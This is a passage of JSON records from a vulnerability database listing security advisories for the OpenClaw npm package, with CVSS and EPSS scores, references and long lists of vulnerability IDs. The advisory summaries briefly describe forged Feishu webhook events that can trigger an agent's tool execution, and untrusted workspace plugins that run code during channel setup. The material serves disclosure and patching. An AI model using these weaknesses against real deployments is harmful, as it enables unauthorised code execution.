ity":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41303","GHSA-98hh-7ghg-x6rq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u9cw-crg5-1kbs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90988?format=json","vulnerability_id":"VCID-u9ja-dgsh-yug2","summary":"Duplicate Advisory: OpenClaw: Feishu webhook mode accepted forged events when only `verificationToken` was configured\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-g353-mgv3-8pcj. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 contains an authentication bypass vulnerability in Feishu webhook mode when only verificationToken is configured without encryptKey, allowing acceptance of forged events. 
Unauthenticated network attackers can inject forged Feishu events and trigger downstream tool execution by reaching the webhook endpoint.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"u
rl":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token"},{"reference_url":"https://github.com/advisories/GHSA-vjqw-w5jr-g9w5","reference_id":"GHSA-vjqw-w5jr-g9w5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vjqw-w5jr-g9w5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"}
,{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"}
,{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"}
,{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"}
,{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"}
,{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-vjqw-w5jr-g9w5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u9ja-dgsh-yug2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89510?format=json","vulnerability_id":"VCID-una1-gxkk-t3bp","s
ummary":"OpenClaw: Untrusted workspace channel shadows could execute during built-in channel setup\n## Summary\n\nBefore OpenClaw 2026.4.2, built-in channel setup and login could resolve an untrusted workspace channel shadow before the plugin was explicitly trusted. A malicious workspace plugin that claimed a bundled channel id could execute during channel setup even while still disabled.\n\n## Impact\n\nA cloned workspace could turn channel setup for a built-in channel into unintended in-process code execution from an untrusted workspace plugin. This bypassed the intended workspace-plugin trust boundary during setup and login.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0` — ignore untrusted workspace channel shadows during setup resolution\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41295","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03582","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03589","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03575","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41295"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"}],"url":"https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements
":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41295","reference_id":"CVE-2026-41295","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41295"},{"reference_url":"https://github.com/advisories/GHSA-2qrv-rc5x-2g2h","reference_id":"GHSA-2qrv-rc5x-2g2h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2qrv-rc5x-2g2h"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup","reference_id":"openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:
npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vul
nerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-